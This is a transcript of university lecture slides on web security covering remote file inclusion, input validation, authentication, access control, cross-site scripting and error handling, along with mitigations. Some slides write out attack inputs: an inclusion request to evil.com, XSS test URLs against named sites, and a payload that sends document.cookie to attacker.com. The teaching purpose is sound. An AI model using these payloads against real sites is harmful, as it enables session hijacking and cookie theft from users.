1 / 26

CIT 380: Securing Computer Systems

CIT 380: Securing Computer Systems. Web Security . Insecure Remote File Inclusion. Insecure remote file inclusion vulnerabilities allow an attack to trick the application into executing code provided by the attacker on another site. Dynamic code Includes in PHP, Java, .NET

asabi
Download Presentation

CIT 380: Securing Computer Systems

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. CIT 380: Securing Computer Systems Web Security CIT 380: Securing Computer Systems

  2. Insecure Remote File Inclusion • Insecure remote file inclusion vulnerabilities allow an attack to trick the application into executing code provided by the attacker on another site. • Dynamic code • Includes in PHP, Java, .NET • DTDs for XML documents • Key Idea • Attacker controls pathname for inclusion. CIT 380: Securing Computer Systems

  3. PHP Remote Inclusion Flaw A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script. • <?php //config.php • $server_root = '/my/path'; • ?> • <?php //include.php • include($server_root . '/someotherfile.php'); • ?> • <?php • // index.php • include('config.php'); • include('include.php'); • // Script body • ?> • GET /include.php?server_root=http://evil.com/command.txt CIT 380: Securing Computer Systems

  4. Mitigating Remote File Inclusion • Turn off remote file inclusion. • Do not run code from uploaded files. • Do not use user-supplied paths. • Validate all paths before loading code. CIT 380: Securing Computer Systems

  5. Unvalidated Input • Unvalidated input is an architecture flaw. • Individual input-related bugs are easy to fix. • How do you defend against the general problem of input-based attacks? • Key Ideas • Application needs to validate all input. • Input validation needs to be part of design. CIT 380: Securing Computer Systems

  6. Input Validation Solutions • All input must be validated. • Input must be validated on the server. • Use a standard set of validation rules. • Reject all input that isn’t in your whitelist. • Blacklists can miss bad inputs. • Input repairs can produce bad input. CIT 380: Securing Computer Systems

  7. Authentication • Authentication is the process of determining a user’s identity. • Key Ideas • HTTP is a stateless protocol. • Every request must be authenticated. • Use username/password on first request. • Use session IDs on subsequent queries. CIT 380: Securing Computer Systems

  8. Authentication Attacks • Sniffing passwords • Guessing passwords • Identity management attacks • Replay attacks • Session ID fixation • Session ID guessing CIT 380: Securing Computer Systems

  9. Identity Management Attacks Auth requires identity management • User registration • Password changes and resets Mitigations • Use CAPTCHAs to protect registration. • Don’t use easy to guess secret questions. • Don’t allow attacker to reset e-mail address that new password is sent to. CIT 380: Securing Computer Systems

  10. Session ID Guessing Do session IDs show a pattern? • How does changing username change ID? • How do session IDs change with time? Brute forcing session IDs • Use program to try 1000s of session IDs. Mitigating guessing attacks • Use a large key space (128+ bits). • Use a cryptographically random algorithm. CIT 380: Securing Computer Systems

  11. Mitigating Authentication Attacks • Use SSL to prevent sniffing attacks. • Require strong passwords. • Use secure identity management. • Use a secure session ID mechanism. • IDs chosen at random from large space. • Regenerate session IDs with each request. • Expire session IDs in short time. CIT 380: Securing Computer Systems

  12. Access Control • Access control determines which users have access to which system resources. • Levels of access control • Site • URL • Function • Function(parameters) • Data CIT 380: Securing Computer Systems

  13. Mitigating Broken Access Control • Check every access. • Use whitelist model at every layer. • Do not rely on client-level access control. • Do not rely on security through obscurity. CIT 380: Securing Computer Systems

  14. Cross-Site Scripting (XSS) • Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing. • XSS used to obtain session ID for • Bank site (transfer money to attacker) • Shopping site (buy goods for attacker) • E-mail • Key ideas • Attacker sends malicious code to server. • Victim’s browser loads code from server and runs it. CIT 380: Securing Computer Systems

  15. XSS Attacks MySpace worm (October 2005) • When someone viewed Samy’s profile: • Set him as friend of viewer. • Incorporated code in viewer’s profile. Paypal (2006) • XSS redirect used to steal money from Paypal users in a phishing scam. BBC, CBS (2006) • By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department. CIT 380: Securing Computer Systems

  16. Stored XSS Stored XSS • Injected script stored in comment, message, etc. • Requires ability to insert malicious code into web documents (comments, reviews, etc.) • Persistent until message deleted. CIT 380: Securing Computer Systems

  17. Reflected XSS Reflected XSS • Injected script returned by one-time message. • Requires tricking user to click on link. • Non-persistent. Only works when user clicks. CIT 380: Securing Computer Systems

  18. Why does XSS Work? Same-Origin Policy • Browser only allows Javascript from site X to access cookies and other data from site X. • Attacker needs to make attack come from site X. Vulnerable Server Program • Any program that returns user input without filtering out dangerous code. CIT 380: Securing Computer Systems

  19. Anatomy of an XSS Attack Web Server 8. Attacker hijacks user session. 1. Login Attacker User 2. Cookie 5. XSS URL 3. XSS Attack 6. Page with injected code. 7. Browser runs injected code. 4. User clicks on XSS link. Evil site saves ID. CIT 380: Securing Computer Systems

  20. XSS URL Examples http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script> http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script> http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1 http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E CIT 380: Securing Computer Systems

  21. Exploiting the Vulnerability • User logins in and is issued a cookie • Attacker feed the URL to user https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script> SIGCSE

  22. Exploiting the Vulnerability • User logins in and is issued a cookie • Attacker feed the URL to user https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script> SIGCSE

  23. Mitigating XSS • Disallow HTML input • Allow only safe HTML tags • Filter output Replace HTML special characters in output ex: replace < with &lt; and > with &gt; also replace (, ), #, & • Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for. • Client: disable Javascript Use NoScript extension for Firefox. CIT 380: Securing Computer Systems

  24. Improper Error Handling • Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly. • Errors can provide too much data • Stack traces • SQL statements • Subsystem errors • User typos, such as passwords. CIT 380: Securing Computer Systems

  25. Example of Improper Error Handling mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucleus/libs/COMMENTS.php on line 124 CIT 380: Securing Computer Systems

  26. Mitigating Improper Error Handling • Catch all exceptions. • Check all error codes. • Wrap application with catch-all handler. • Send user-friendly message to user. • Store details for debugging in log files. • Don’t log passwords or other sensitive data. CIT 380: Securing Computer Systems

More Related